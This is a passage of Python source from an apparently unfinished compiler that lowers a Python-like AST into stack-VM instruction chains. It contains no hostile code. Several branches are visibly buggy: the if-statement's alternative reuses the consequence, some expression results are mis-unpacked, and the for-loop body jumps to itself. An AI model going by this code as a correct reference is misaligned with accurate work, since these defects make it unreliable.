pass\n        elif isinstance(name, Identifier):\n            name = name.name\n        elif isinstance(name, ProcedureDefinition):\n            name = name.name\n        elif isinstance(name, PropertyDefinition):\n            name = name.name\n        elif isinstance(name, ClassDefinition):\n            name = name.name\n        else:\n            raise TypeError(f\"Cannot declare names for objects of type {type(name)}!\")\n\n        while True:\n            if isinstance(top, BlockStack.FunctionBlock) \\\n                    or (name is None and isinstance(top, (BlockStack.ClassBlock, BlockStack.ModuleBlock))):\n                # We are declaring a local variable in the stack frame (either for a function, or in a class/module\n                # definition, in which an anonymous variable is needed).\n                # The stack frame always has the same layout for all invocations of that function/declaration,\n                # so we just add one more variable to that layout.\n                offset = top.offset\n                self._blocks[idx] = type(top)(offset + 1)\n                r = FrameReference(offset)\n                self._decl2ref[name] = r\n                return r\n            elif isinstance(top, (BlockStack.ClassBlock, BlockStack.ModuleBlock)):\n                # We are declaring a class/module member. We know that the class/module definition code is\n                # running under a stack frame that has a Namespace object at offset 0. That object needs to be extended.\n                slot = FrameReference(0)\n                r = NameReference(slot, name)\n                chain.append_update(TRef(r), terms.CNone(), on_error)\n                self._decl2ref[name] = r\n                return r\n            else:\n                try:\n                    idx, top = idx + 1, next(blocks_iter)\n                except StopIteration:\n                    raise Exception(\"Bug in declare_name!\")\n\n    def decl2ref(self, name):\n        \"\"\"\n        Retrieves the reference that was created for the given name.\n        :param name: Either an AST node, or a string, for which declare_name has been called.\n        :return: A Reference object.\n        \"\"\"\n        try:\n            return self._decl2ref[name]\n        except KeyError:\n            if isinstance(name, Identifier):\n                return self._decl2ref[name.name]\n            raise\n\n    def declare_pattern(self, chain, pattern, on_error):\n        \"\"\"\n        Statically declares new variable names for an entire pattern of names.\n        Depending on the context the names will be declared as stack frame\n        variables, or as namespace entries. 
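# declare_name above walks the block stack from the innermost block outwards
# to decide where a variable lives: function blocks (and anonymous variables
# in class/module blocks) get a fixed stack-frame offset, while named class
# and module members become entries of the Namespace object at frame offset 0.
# A stripped-down model of just that decision; the string block kinds and the
# allocate name are assumptions of this sketch:

def allocate(blocks, name):
    for kind in reversed(blocks):      # innermost block first
        if kind == "function" or (name is None and kind in ("class", "module")):
            return "frame slot"        # fixed offset in the stack frame
        if kind in ("class", "module"):
            return "namespace entry"   # named member of a Namespace object
    raise RuntimeError("no enclosing block")

print(allocate(["module", "class", "function"], "x"))  # frame slot
print(allocate(["module", "class"], "x"))              # namespace entry
print(allocate(["module"], None))                      # frame slot (anonymous)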
The new variables are recorded for the given pattern, such that they can\n easily be retrieved later.\n :param chain: The Chain to which the instructions for allocating the new variables should be appended.\n :param on_error: The Chain to which control should be transferred if the allocation code fails.\n :param pattern: The AssignableExpression node holding the pattern expression for which to allocate new variables.\n \"\"\"\n\n if isinstance(pattern, Identifier):\n self.declare_name(chain, pattern, on_error)\n elif isinstance(pattern, AssignableExpression):\n for c in pattern.children:\n self.declare_pattern(chain, c, on_error)\n else:\n raise TypeError(\"Patterns to be declared must only contain AssignableExpression nodes,\"\n \" not nodes of type {}!\".format(type(pattern)))\n\n def emit_assignment(self, chain, pattern, dec, expression, on_error, declaring=False):\n \"\"\"\n Emits VM code for a assigning the result of an expression evaluation to a pattern.\n :param chain: The chain to which the assignment should be appended.\n :param pattern: An AssignableExpression to which a value should be assigned.\n :param dec: A dict mapping AST nodes to decorations.\n :param expression: The expression the result of which is to be assigned.\n :param on_error: The chain that execution should jump to in case of an error.\n :param declaring: Specifies if this assignment is part of a declaration, in which case it is assumed that\n the given pattern is a *defining* occurrence of the declared name, not a *using* one.\n The difference between these cases is that *using* occurrences will be mapped to defining\n ones first, before the runtime reference for them can be retrieved.\n :return: The chain with which execution is to be continued after the call.\n \"\"\"\n\n # First we evaluate the expression:\n t, chain = self.translate_expression(chain, expression, dec, on_error)\n\n def assign(chain, pattern, t, on_error):\n if isinstance(pattern, Identifier):\n if not declaring:\n pattern = dec[pattern][1]\n r = self.decl2ref(pattern)\n chain.append_update(TRef(r), t, on_error)\n return chain\n elif isinstance(pattern, Tuple):\n # FIXME: What we are doing here will not work if t represents a general iterable! 
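# The Tuple branch of assign, continued just below, decomposes a destructuring
# assignment into one recursive assignment per component, each reading an
# indexed projection of the already-evaluated value term. A rough stand-alone
# model of that lowering; the function name and the string rendering of terms
# are assumptions of this sketch:

def lower_tuple_assignment(pattern, value):
    updates = []
    for idx, component in enumerate(pattern):
        projected = f"Project({value}, CInt({idx}))"
        if isinstance(component, tuple):   # nested pattern: recurse
            updates += lower_tuple_assignment(component, projected)
        else:
            updates.append((component, projected))
    return updates

for ref, term in lower_tuple_assignment(("a", ("b", "c")), "t"):
    print(ref, "<-", term)
# a <- Project(t, CInt(0))
# b <- Project(Project(t, CInt(1)), CInt(0))
# c <- Project(Project(t, CInt(1)), CInt(1))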
For that we would\n # need to call a procedure first that turns it into a sequence.\n for idx, c in enumerate(pattern.children):\n chain = assign(chain, c, terms.Project(t, terms.CInt(idx)), on_error)\n elif isinstance(pattern, Projection):\n callee, chain = self.translate_expression(chain, Attribute(pattern.value, \"__set_item__\"), dec, on_error)\n index, chain = self.translate_expression(chain, pattern.index, dec, on_error)\n return self.emit_call(chain, callee, [index, t], on_error)\n elif isinstance(pattern, Attribute):\n # Python's \"Descriptor How-To Guide\"\n # (https://docs.python.org/3/howto/descriptor.html#overview-of-descriptor-invocation)\n # lists the following procedure for attribute lookup:\n # def object_getattribute(obj, name):\n # \"Emulate PyObject_GenericGetAttr() in Objects/object.c\"\n # null = object()\n # objtype = type(obj)\n # cls_var = find_name_in_mro(objtype, name, null)\n # descr_get = getattr(type(cls_var), '__get__', null)\n # if descr_get is not null:\n # if (hasattr(type(cls_var), '__set__')\n # or hasattr(type(cls_var), '__delete__')):\n # return descr_get(cls_var, obj, objtype) # data descriptor\n # if hasattr(obj, '__dict__') and name in vars(obj):\n # return vars(obj)[name] # instance variable\n # if descr_get is not null:\n # return descr_get(cls_var, obj, objtype) # non-data descriptor\n # if cls_var is not null:\n # return cls_var # class variable\n # raise AttributeError(name)\n\n # We do not have general descriptors, but we have properties (which are data descriptors) and we have\n # methods (which are non-data descriptors). Hence for us the procedure above becomes this:\n\n a, chain = self.translate_expression(chain, pattern.value, dec, on_error)\n\n r = self.declare_name(chain, None, on_error)\n chain.append_update(r, terms.StoreAttrCase(a, pattern.name), on_error)\n\n csetter = terms.UnaryPredicateTerm(terms.UnaryPredicate.ISCALLABLE, r)\n cexception = terms.UnaryPredicateTerm(terms.UnaryPredicate.ISEXCEPTION, r)\n cupdate = ~(csetter | cexception)\n\n setter = Chain()\n update = Chain()\n exception = Chain()\n successor = Chain()\n chain.append_guard({csetter: setter, cupdate: update, cexception: exception}, on_error)\n\n self.emit_call(setter, r, [t], on_error)\n setter.append_jump(successor)\n\n update.append_update(r, t, on_error)\n update.append_jump(successor)\n\n exception.append_update(ExceptionReference(), r, on_error)\n exception.append_jump(on_error)\n\n return successor\n\n # TODO: Implement this for 'super', see https://docs.python.org/3/howto/descriptor.html#invocation-from-super\n # and https://www.python.org/download/releases/2.2.3/descrintro/#cooperation\n elif isinstance(pattern, AssignableExpression):\n raise NotImplementedError(\"Assignment to patterns of type {} \"\n \"has not been implemented yet!\".format(type(pattern)))\n else:\n raise TypeError(\"The pattern to which a value is assigned must be an \"\n \"AssignableExpression, not a {}!\".format(type(pattern)))\n\n return assign(chain, pattern, t, on_error)\n\n def emit_import(self, chain, spec, subnames, name, mapping, on_error):\n \"\"\"\n Emits code for an import.\n :param chain: The chain to which the import should be appended.\n :param spec: The ModuleSpecification for the module to import.\n :param name: The name the imported module should be bound to, unless the name is None.\n :param subnames: The chain of submodule names to follow from the root module. 
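# The comment block in the Attribute branch above quotes the attribute-lookup
# procedure from Python's Descriptor How-To Guide. A condensed, runnable
# version of that procedure for checking the data- vs. non-data-descriptor
# precedence it encodes; the MRO scan approximates find_name_in_mro, and none
# of this is the engine's own code:

def lookup(obj, name):
    null = object()
    objtype = type(obj)
    cls_var = next((vars(k)[name] for k in objtype.__mro__ if name in vars(k)), null)
    descr_get = getattr(type(cls_var), '__get__', null)
    if descr_get is not null and (hasattr(type(cls_var), '__set__')
                                  or hasattr(type(cls_var), '__delete__')):
        return descr_get(cls_var, obj, objtype)   # data descriptor wins
    if hasattr(obj, '__dict__') and name in vars(obj):
        return vars(obj)[name]                    # instance variable
    if descr_get is not null:
        return descr_get(cls_var, obj, objtype)   # non-data descriptor
    if cls_var is not null:
        return cls_var                            # plain class variable
    raise AttributeError(name)

class C:
    @property
    def p(self):
        return "from property"

c = C()
c.__dict__['p'] = "shadowed"
print(lookup(c, 'p'))  # "from property": the data descriptor beats vars(c)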
This must be an iterable of\n strings, that can be empty.\n :param mapping: A mapping from string names to be defined by this import statement to string names defined\n in the imported module.\n :param on_error: The chain that execution should jump to in case of an error.\n :return: The chain with which execution is to be continued after the call.\n \"\"\"\n\n check_type(spec, ModuleSpecification)\n\n module = spec.resolve()\n\n m, chain = self.emit_call(chain, CTerm(self._import_procedure),\n [CTerm(ProgramLocation(module, 0))], on_error)\n\n m = TRef(m)\n\n for a in subnames:\n m = terms.Lookup(m, CString(a))\n\n if name is not None:\n chain.append_update(TRef(self.declare_name(chain, name, on_error)), m, on_error)\n\n for name, member in mapping.items():\n chain.append_update(TRef(self.declare_name(chain, name, on_error)), Lookup(m, CString(member)), on_error)\n\n return chain\n\n def emit_call(self, chain, callee, args, on_error):\n \"\"\"\n Emits VM code for a procedure call.\n :param chain: The chain to which the call should be appended.\n :param callee: A Term object representing the procedure to be called.\n :param args: An iterable of term objects representing the arguments to the call.\n :param on_error: The chain that execution should jump to in case of an error.\n :return: A pair (t, c), where t is the term representing the return value of the call and c is the chain\n in which execution is to be continued after the call.\n \"\"\"\n\n # Make sure that the right number of arguments is being used:\n call = Chain()\n argc_error = Chain()\n argc_error.append_update(TRef(ExceptionReference()), terms.NewTypeError(\"Wrong number of arguments for call!\"), on_error)\n argc_error.append_jump(on_error)\n match = terms.Comparison(ComparisonOperator.EQ, terms.NumArgs(callee), terms.CInt(len(args)))\n chain.append_guard({match: call, negate(match): argc_error}, on_error)\n\n call.append_push(callee, args, on_error)\n\n successor = Chain()\n noerror = terms.Comparison(ComparisonOperator.EQ, terms.Read(TRef(ExceptionReference())), terms.CNone())\n call.append_guard({negate(noerror): on_error, noerror: successor}, on_error)\n\n rv = self.declare_name(successor, None, on_error)\n rr = ReturnValueReference()\n successor.append_update(TRef(rv), terms.Read(TRef(rr)), on_error)\n return rv, successor\n\n def translate_expression(self, chain, node, dec, on_error):\n \"\"\"\n Translates an AST expression into a machine expression.\n :param node: An AST node representing an expression.\n :param dec: A dict mapping AST nodes to decorations.\n :return: A pair (t, c), where t is the term representing the result of expression evaluation and c is the chain\n in which execution is to be continued after evaluation of the expression.\n \"\"\"\n\n if isinstance(node, Constant):\n value = dec[node]\n if isinstance(value, bool):\n return (terms.CBool(True) if value == True else terms.CBool(False)), chain\n elif isinstance(value, str):\n return terms.CString(value), chain\n elif value is None:\n return terms.CNone(), chain\n elif isinstance(value, int):\n return terms.CInt(value), chain\n elif isinstance(value, float):\n return terms.CFloat(value), chain\n else:\n raise NotImplementedError(\"Translation of constant expressions of type {}\"\n \" has not been implemented!\".format(type(value)))\n elif isinstance(node, Identifier):\n return Read(CTerm(self.decl2ref(dec[node][1]))), chain\n elif isinstance(node, Attribute):\n v, chain = self.translate_expression(chain, node.value, dec, on_error)\n\n r = 
self.declare_name(chain, None, on_error)\n chain.append_update(r, terms.LoadAttrCase(v, node.name), on_error)\n\n cgetter = terms.UnaryPredicateTerm(terms.UnaryPredicate.ISGETTER, r)\n\n getter = Chain()\n successor = Chain()\n chain.append_guard({cgetter: getter, ~cgetter: successor}, on_error)\n\n v, getter = self.emit_call(getter, r, [], on_error)\n getter.append_update(r, v, on_error)\n getter.append_jump(successor)\n\n return r, successor\n\n # TODO: Implement this for 'super', see https://docs.python.org/3/howto/descriptor.html#invocation-from-super\n # and https://www.python.org/download/releases/2.2.3/descrintro/#cooperation\n elif isinstance(node, Call):\n args = []\n for a in node.arguments:\n v, chain = self.translate_expression(chain, a, dec, on_error)\n args.append(v)\n\n callee, chain = self.translate_expression(chain, node.callee, dec, on_error)\n return self.emit_call(chain, callee, args, on_error)\n elif isinstance(node, Launch):\n args = []\n for a in node.arguments:\n v, chain = self.translate_expression(chain, a, dec, on_error)\n args.append(v)\n callee, chain = self.translate_expression(chain, node.callee, dec, on_error)\n chain.append_launch(callee, args, on_error)\n t = self.declare_name(chain, None, on_error)\n chain.append_update(t, terms.Read(ReturnValueReference()), on_error)\n return t, chain\n elif isinstance(node, Await):\n t = self.translate_expression(chain, node.process, dec, on_error)\n successor = Chain()\n complete = terms.UnaryPredicateTerm(terms.UnaryPredicate.ISTERMINATED, t)\n chain.append_guard({complete: successor}, on_error)\n\n successor = Chain()\n noerror = terms.Comparison(ComparisonOperator.EQ, terms.Read(ExceptionReference()), terms.CNone())\n chain.append_guard({~noerror: on_error, noerror: successor}, on_error)\n\n rv = self.declare_name(successor, None, on_error)\n rr = ReturnValueReference()\n successor.append_update(rv, terms.Read(rr), on_error)\n successor.append_update(rr, terms.CNone(), on_error)\n return rv, successor\n elif isinstance(node, Projection):\n idx, chain = self.translate_expression(chain, node.index, dec, on_error)\n v, chain = self.translate_expression(chain, node.value, dec, on_error)\n callee, chain = self.translate_expression(chain, Attribute(v, \"__get_item__\"), dec, on_error)\n return self.emit_call(chain, callee, [idx], on_error)\n elif isinstance(node, UnaryOperation):\n return terms.UnaryOperation(node.operator, self.translate_expression(chain, node.operand, dec, on_error)), chain\n elif isinstance(node, ArithmeticBinaryOperation):\n left, chain = self.translate_expression(chain, node.left, dec, on_error)\n right, chain = self.translate_expression(chain, node.right, dec, on_error)\n return terms.ArithmeticBinaryOperation(node.operator, left, right), chain\n elif isinstance(node, Comparison):\n return terms.Comparison(node.operator,\n self.translate_expression(chain, node.left, dec, on_error),\n self.translate_expression(chain, node.right, dec, on_error)), chain\n elif isinstance(node, BooleanBinaryOperation):\n # Note: Like in Python, we want AND and OR to be short-circuited. 
This means that we require some control\n            # flow in order to possibly skip the evaluation of the right operand.\n\n            v = self.declare_name(chain, None, on_error)\n            left, chain = self.translate_expression(chain, node.left, dec, on_error)\n            chain.append_update(v, left, on_error)\n\n            rest = Chain()\n            successor = Chain()\n\n            if node.operator == BooleanBinaryOperator.AND:\n                skip = ~terms.Read(v)\n            elif node.operator == BooleanBinaryOperator.OR:\n                skip = terms.Read(v)\n            else:\n                skip = terms.CBool(False)\n\n            chain.append_guard({skip: successor, ~skip: rest}, on_error)\n\n            # The guard finalizes the current chain, so the right operand and\n            # the combination of both operands belong to the 'rest' chain:\n            right, rest = self.translate_expression(rest, node.right, dec, on_error)\n            rest.append_update(v, terms.BooleanBinaryOperation(node.operator, terms.Read(v), right), on_error)\n            rest.append_jump(successor)\n            return terms.Read(v), successor\n        elif isinstance(node, Tuple):\n            return terms.NewTuple(*(self.translate_expression(chain, c, dec, on_error) for c in node.children)), chain\n        else:\n            raise NotImplementedError()\n\n    def emit_return(self, on_error, chain=None):\n        \"\"\"\n        Emits code for a return statement, under the assumption that the return value has already been set for the task.\n        :param chain: The chain to emit the code to. If this is omitted, a new chain will be created.\n        :param on_error: The chain to jump to in case of an error.\n        :return: Either the given chain, or the newly created one (if no chain was given).\n        \"\"\"\n\n        if chain is None:\n            chain = Chain()\n\n        # Walk over the block stack (\"outwards\"), until you hit either an exception block or arrive at the function body:\n        for entry in self._blocks:\n            if isinstance(entry, BlockStack.ExceptionBlock):\n                chain.append_update(ExceptionReference(), terms.NewJumpError(VReturnError), on_error=on_error)\n                chain.append_jump(entry.finallyChain)\n                return chain\n            elif isinstance(entry, BlockStack.FunctionBlock):\n                break\n\n        # We made it to the function level without hitting an exception block.\n        chain.append_update(TRef(ExceptionReference()), terms.CNone(), on_error=on_error)\n        chain.append_pop()\n\n        return chain\n\n    def emit_break(self, on_error, chain=None):\n        \"\"\"\n        Emits code for a break statement.\n        :param chain: The chain to emit the code to. If this is omitted, a new chain will be created.\n        :param on_error: The chain to jump to in case of an error.\n        :return: Either the given chain, or the newly created one (if no chain was given).\n        \"\"\"\n\n        if chain is None:\n            chain = Chain()\n\n        # Walk over the block stack (\"outwards\"), until you hit either an exception block or a loop:\n        for entry in self._blocks:\n            if isinstance(entry, BlockStack.ExceptionBlock):\n                chain.append_update(ExceptionReference(), terms.NewJumpError(VBreakError), on_error=on_error)\n                chain.append_jump(entry.finallyChain)\n                return chain\n            elif isinstance(entry, BlockStack.LoopBlock):\n                chain.append_update(ExceptionReference(), terms.CNone(), on_error=on_error)\n                chain.append_jump(entry.successorChain)\n                return chain\n\n        raise AssertionError(\"This code location must never be reached,\"\n                             \" because break statements cannot be emitted outside loops!\")\n\n    def emit_continue(self, on_error, chain=None):\n        \"\"\"\n        Emits code for a continue statement.\n        :param chain: The chain to emit the code to. 
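# The short-circuit translation above stashes the left operand in a fresh
# variable and then guards on it, so the chain for the right operand is only
# entered when it can still change the result. The same evaluation order,
# hand-written with plain Python thunks; eval_and and loud are illustrative
# names, not emitted code:

def eval_and(eval_left, eval_right):
    v = eval_left()          # evaluate and stash the left operand
    if not v:                # guard: skip the right-hand side entirely
        return v
    return eval_right()      # only reached when the left side is truthy

def loud(value):
    def thunk():
        print("evaluating", value)
        return value
    return thunk

eval_and(loud(False), loud(True))   # prints only: evaluating False
eval_and(loud(True), loud(False))   # prints both lines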
If this is omitted, a new chain will be created.\n :param on_error: The chain to jump to in case of an error.\n :return: Either the given chain, or the newly created one (if no chain was given).\n \"\"\"\n\n if chain is None:\n chain = Chain()\n\n # Walk over the block stack (\"outwards\"), until you hit either an exception block or a loop:\n for entry in self._blocks:\n if isinstance(entry, BlockStack.ExceptionBlock):\n chain.append_update(ExceptionReference(), terms.NewJumpError(VContinueError), on_error=on_error)\n chain.append_jump(entry.finallyChain)\n return chain\n elif isinstance(entry, BlockStack.LoopBlock):\n chain.append_update(ExceptionReference(), terms.CNone(), on_error=on_error)\n chain.append_jump(entry.headChain)\n return chain\n\n raise AssertionError(\"This code location must never be reached,\"\n \" because break statements cannot be emitted outside loops!\")\n\n def _emit_procedure(self, chain, name, argnames, body, dec, on_error):\n \"\"\"\n Emits code for a procedure declaration.\n :param name: The AST node representing the name of the procedure.\n :param argnames: A tuple of AST nodes representing the argument names of the procedure.\n :param body: The AST node representing the body of the procedure.\n :param dec:\n :param on_error:\n :return: A pair (v, c), where v is a Term representing the procedure object and c is the chain to which code\n following the procedure definition can be appended.\n \"\"\"\n\n bodyBlock = Chain()\n exitBlock = Chain()\n\n num_args = len(argnames)\n\n self._blocks.push(BlockStack.FunctionBlock(0))\n\n # Declare the function arguments as local variables:\n for aname in argnames:\n self.declare_pattern(bodyBlock, aname, on_error)\n\n body = self.translate_statement(bodyBlock, body, dec, exitBlock)\n body.append_pop()\n\n exitBlock.append_pop()\n\n # TODO (later): The function definition might be nested in another one.\n # Since it might \"escape\" the enclosing function, the variables that are shared between\n # the functions cannot be allocated on the stack.\n # Those variables that are shared must be allocated in a \"Heap frame\", the pointer to which\n # is part of the Function object that is constructed (IT CANNOT BE PASSED AS AN ARGUMENT!\n # REASON: The function object is not being called here, but later,\n # by some other code that receives the function object!)\n # The compilation of the inner function\n # must thus map the shared variables to offsets in the heap frame.\n # --> For now we should just *detect* nonlocal variables and raise a NotImplementedError\n\n f = terms.NewProcedure(num_args, body.compile())\n\n self._blocks.pop()\n\n if name is None:\n return f, chain\n else:\n name = self.declare_pattern(chain, name, on_error)\n chain = chain.append_update(name, f, on_error)\n return name, chain\n\n def translate_statement(self, chain, node, dec, on_error):\n \"\"\"\n Translates a statement into a StackProgram.\n :param chain: The chain to which to append the translation of the statement.\n :param node: An AST node representing a Statement.\n :param dec: A dict mapping AST nodes to decorations.\n :param on_error: The chain to jump to in case an (unhandled) error occurs during the execution of the translated\n statement.\n :return: A Chain object that the instructions resulting from the translation of the statement will jump to\n after completing the execution of the statement.\n \"\"\"\n\n if isinstance(node, Pass):\n pass\n elif isinstance(node, ExpressionStatement):\n _, chain = self.translate_expression(chain, 
node.expression, dec, on_error)\n # The previous line generated code for any side effects of the expression.\n # We do not really need to use the expression itself,\n # because its evaluation result is not to be bound to anything.\n return chain\n elif isinstance(node, Assignment):\n chain = self.emit_assignment(chain, node.target, dec, node.value, on_error)\n return chain\n elif isinstance(node, Block):\n for s in node.children:\n chain = self.translate_statement(chain, s, dec, on_error)\n return chain\n elif isinstance(node, Return):\n if node.value is not None:\n r, chain = self.translate_expression(chain, node.value, dec, on_error)\n chain.append_update(ReturnValueReference(), r, on_error)\n self.emit_return(on_error, chain)\n return Chain()\n elif isinstance(node, Raise):\n if node.value is None:\n found = False\n # Walk over the block stack (\"outwards\") to find the exception block this re-raise is contained in.\n for entry in self._blocks:\n if isinstance(entry, BlockStack.ExceptionBlock):\n chain.append_update(ExceptionReference(), terms.Read(entry.exceptionVariable), on_error=on_error)\n found = True\n if not found:\n raise AssertionError(\n \"A raise statement without an expression should not occur outside a try block!\")\n else:\n e, chain = self.translate_expression(chain, node.value, dec, on_error)\n chain.append_update(ExceptionReference(), e, on_error)\n chain.append_jump(on_error)\n return Chain()\n elif isinstance(node, Break):\n self.emit_break(on_error, chain)\n return Chain()\n elif isinstance(node, Continue):\n self.emit_continue(on_error, chain)\n return Chain()\n elif isinstance(node, Conditional):\n consequence = Chain()\n alternative = Chain()\n successor = Chain()\n condition, chain = self.translate_expression(chain, node.condition, dec, on_error)\n chain.append_guard({condition: consequence, ~condition: alternative}, on_error)\n consequence = self.translate_statement(consequence, node.consequence, dec, on_error)\n consequence.append_jump(successor)\n alternative = self.translate_statement(alternative, node.consequence, dec, on_error)\n alternative.append_jump(successor)\n return successor\n elif isinstance(node, While):\n head = Chain()\n body = Chain()\n successor = Chain()\n chain.append_jump(head)\n condition, head = self.translate_expression(head, node.condition, dec, on_error)\n head.append_guard({condition: body, ~condition: successor}, on_error)\n self._blocks.push(BlockStack.LoopBlock(head, successor))\n body = self.translate_statement(body, node.body, dec, on_error)\n self._blocks.pop()\n body.append_jump(head)\n return successor\n elif isinstance(node, For):\n \"\"\"\n A for loop is syntactic sugar for:\n it = xs.__iter__()\n while True:\n try:\n pattern = it.__next__()\n except StopIteration:\n break\n \n \"\"\"\n\n stopper = Chain()\n body = Chain()\n successor = Chain()\n\n iterable, chain = self.translate_expression(chain, node.iterable, dec, on_error)\n callee, chain = self.translate_expression(chain, Attribute(iterable, \"__iter__\"), dec, on_error)\n iterator, chain = self.emit_call(chain, callee, [], on_error)\n\n self.declare_pattern(chain, node.pattern, on_error)\n\n chain.append_jump(body)\n\n callee, body = self.translate_expression(body, Attribute(iterator, \"__next__\"), dec, on_error)\n element, body = self.emit_call(body, callee, [], stopper)\n\n s = terms.IsInstance(terms.Read(ExceptionReference()), TStopIteration.instance)\n stopper.append_guard({s: successor, ~s: on_error}, on_error)\n successor.append_update(ExceptionReference(), 
terms.CNone(), on_error)\n\n head = self.emit_assignment(chain, node.pattern, dec, element, on_error)\n\n self._blocks.push(BlockStack.LoopBlock(head, successor))\n self.translate_statement(body, node.body, dec, on_error)\n self._blocks.pop()\n body.append_jump(body)\n return successor\n elif isinstance(node, Try):\n\n body = Chain()\n handler = Chain()\n restoration = Chain()\n finally_head = Chain()\n successor = Chain()\n exception = self.declare_name(body, None, on_error)\n self._blocks.push(BlockStack.ExceptionBlock(exception, finally_head))\n self.translate_statement(body, node.body, dec, handler)\n body.append_jump(finally_head)\n\n # As the very first step, the exception variable of the task is cleared:\n handler.append_update(exception, terms.Read(ExceptionReference()), on_error)\n handler.append_update(ExceptionReference(), terms.CNone(), on_error)\n\n for h in node.handlers:\n sc = Chain()\n hc = Chain()\n handler, t = self.translate_expression(handler, h.type, dec, finally_head)\n match = terms.IsInstance(exception, t)\n handler.append_guard({match: hc, ~match: sc}, finally_head)\n\n self._decl2ref[h] = exception\n hc = self.translate_statement(hc, h.body, dec, finally_head)\n hc.append_jump(finally_head)\n\n handler = sc\n\n # If none of the handlers apply, restore the exception variable and jump to the finally:\n handler.append_jump(restoration)\n\n restoration.append_update(ExceptionReference(), terms.Read(exception), on_error)\n restoration.append_update(exception, terms.CNone(), on_error)\n restoration.append_jump(finally_head)\n\n self._blocks.pop()\n\n if node.final is not None:\n # The finally clause first stashes the current exception and return value away:\n returnvalue = self.declare_name(finally_head, None, on_error)\n finally_head.append_update(exception, terms.Read(ExceptionReference()), on_error)\n finally_head.append_update(ExceptionReference(), terms.CNone(), on_error)\n finally_head.append_update(returnvalue, terms.Read(ReturnValueReference()), on_error)\n finally_head.append_update(ReturnValueReference(), terms.CNone(), on_error)\n # Then it executes its body:\n finally_foot = self.translate_statement(finally_head, node.final, dec, on_error)\n # Then it restores the stashed exception and return value:\n finally_foot.append_update(ReturnValueReference(), terms.Read(returnvalue), on_error)\n finally_foot.append_update(ExceptionReference(), terms.Read(exception), on_error)\n finally_foot.append_update(returnvalue, terms.CNone(), on_error)\n else:\n finally_foot = finally_head\n\n # Then it decides where to jump to, depending on the exception that caused the finally to be entered:\n e = terms.Read(ExceptionReference())\n condition_return = terms.IsInstance(e, types.TReturnException())\n condition_break = terms.IsInstance(e, types.TBreakException())\n condition_continue = terms.IsInstance(e, types.TContinueException())\n\n condition_exception = terms.IsInstance(e, types.TException()) & ~condition_break & ~condition_continue & ~condition_return\n condition_termination = terms.Comparison(ComparisonOperator.IS, e, terms.CNone)\n finally_foot.append_guard({condition_termination: successor,\n condition_return: self.emit_return(on_error),\n condition_break: self.emit_break(on_error),\n condition_continue: self.emit_continue(on_error),\n condition_exception: on_error,\n }, on_error)\n\n return successor\n elif isinstance(node, VariableDeclaration):\n self.declare_pattern(chain, node.pattern, on_error)\n if node.expression is not None:\n chain = 
self.emit_assignment(chain, node.pattern, dec, node.expression, on_error, declaring=True)\n            return chain\n        elif isinstance(node, ProcedureDefinition):\n            if not isinstance(self._blocks[-1], (BlockStack.ClassBlock, BlockStack.ModuleBlock)):\n                raise NotImplementedError(\"Code generation for procedure definitions on levels other than module level \"\n                                          \"or class level has not been implemented yet!\")\n\n            _, chain = self._emit_procedure(chain, node.name, node.argnames, node.body, dec, on_error)\n            return chain\n\n        elif isinstance(node, PropertyDefinition):\n\n            getter, chain = self._emit_procedure(chain, None, [\"self\"], node.getter, dec, on_error)\n            setter, chain = self._emit_procedure(chain, None, [\"self\", node.vname], node.setter, dec, on_error)\n\n            # A property is a special kind of descriptor (see https://docs.python.org/3/glossary.html#term-descriptor).\n            # A property object does not have private data. It only holds the getter and the setter. Both those\n            # methods take an instance as argument and then read/write that.\n\n            name = self.declare_pattern(chain, node.name, on_error)\n            chain.append_update(name, terms.NewProperty(getter, setter), on_error)\n            return name, chain\n\n        elif isinstance(node, ClassDefinition):\n            if not isinstance(self._blocks[-1], BlockStack.ModuleBlock):\n                # This would be problematic, because the type might incorporate local variables from the current function\n                # stack. This is difficult to implement for the same reason that nested function declarations are.\n                raise NotImplementedError(\"Code generation for class definitions on levels other than module level \"\n                                          \"has not been implemented yet!\")\n\n            self._blocks.push(BlockStack.ClassBlock(0))\n\n            name = self.declare_pattern(chain, node.name, on_error)\n\n            super_classes = []\n            for s_expression in node.bases:\n                s_term, chain = self.translate_expression(chain, s_expression, dec, on_error)\n                super_classes.append(s_term)\n\n            # We create a new Namespace object and put it into the stack frame.\n            chain.append_push()\n            chain.append_update(TRef(FrameReference(0)), terms.NewNamespace(), on_error)\n\n            chain = self.translate_statement(chain, node.body, dec, on_error)\n\n            chain.append_update(name, terms.NewClass(super_classes, terms.Read(TRef(FrameReference(0)))), on_error)\n            chain.append_pop()\n\n            self._blocks.pop()\n\n            return chain\n\n        elif isinstance(node, (ImportNames, ImportSource)):\n\n            ms = check_type(dec[node.source], ModuleSpecification)\n            subnames = list(map(str, node.source.identifiers[1:]))\n\n            if isinstance(node, ImportSource):\n                mapping = {}\n                if node.alias is None:\n                    if len(node.source.identifiers) != 1:\n                        raise NotImplementedError(\"Code generation for a source import that contains dots has not been implemented!\")\n                    name = node.source.identifiers[0]\n                else:\n                    name = node.alias\n            elif isinstance(node, ImportNames):\n                if node.wildcard:\n                    raise NotImplementedError(\"Compilation of wildcard imports has not been implemented!\")\n                mapping = {alias.name: name.name for name, alias in node.aliases.items()}\n                name = None\n            else:\n                raise NotImplementedError(\"Code generation for nodes of type {}\"\n                                          \" has not been implemented!\".format(type(node)))\n\n            return self.emit_import(chain, ms, subnames, name, mapping, on_error)\n        else:\n            raise NotImplementedError()\n\n    def emit_preamble(self):\n        \"\"\"\n        Emits code that is to run once at the beginning of execution.\n        :return: A Chain object.\n        \"\"\"\n\n        \"\"\" We generate code for this:\n        \n        var mcv = {}\n\n        def ___import___(location):\n            try:\n                return 
